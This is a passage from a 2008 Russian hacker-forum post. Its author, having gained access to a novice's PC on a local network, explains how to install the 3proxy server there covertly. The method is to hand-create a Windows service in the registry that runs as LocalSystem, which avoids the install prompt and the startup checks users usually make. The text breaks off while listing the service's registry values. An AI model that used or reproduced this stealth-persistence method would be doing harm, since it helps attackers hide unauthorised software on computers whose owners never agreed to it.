Статьи Автозагрузка 3proxy и др. через службы

Discussion in 'Статьи' started by .dimoN., 17 Jul 2008.

  1. .dimoN.

    .dimoN. Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    76
    Likes Received:
    56
    Reputations:
    5
    Вобщем это моя первая статья и т.к. сам я новичок, то ничего особенного тут не будет.
    Получив доступ к одному компу чайника в локалке мне захотелось поставить на нем прокси. Но как это сделать незаметно? Вот об этом я и расскажу. В сети полно различных прокси серверов, но мне был необходим максимально незаметный. Мой выбор остановился на 3proxy, т.к. все его настройки хранятся в отдельном файле, нет никаких значков в трее, возможность работы как служба. 3proxy поддерживает HTTP, SOCKSv4/SOCKSv4.5/SOCKSv5, FTP proxy и многое другое. Обо всех возможностях можете прочитать на 3proxy.ru

    Сейчас большинство пользователей знают что многие программы прописывают себя в реестр для автозагрузки и периодически проверяют это с помощью msconfig или других программ, но на службы обращают внимание очень редко. Некоторые даже о них ничего не слышали… Немного о службах http://ru.wikipedia.org/wiki/Службы_Windows

    Теперь качаем 3proxy тут. Наш прокси в папке bin.
    Установить как службу можно так
    C:\Program Files\3proxy\3proxy.exe --install C:\Program Files\3proxy\3proxy.cfg
    Но при этом выскакивает запрос с подтверждением
    [​IMG]
    Поэтому такой вариант нам совсем не подходит и мы будем создавать службу вручную.
    Все настройки служб хранятся в реестре HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services.

    Параметры, которые необходимы для работы службы:
    Description - описание службы
    DisplayName - имя службы, отбражаемое в списке всех служб
    ErrorControl - критичность ошибок службы для работы системы. Обычно устанавливают 0
    ImagePath - путь к исполняемому файлу
    ObjectName - имя пользователя, от которого будет запущена служба. Ставим LocalSystem чтоб запускать с правами system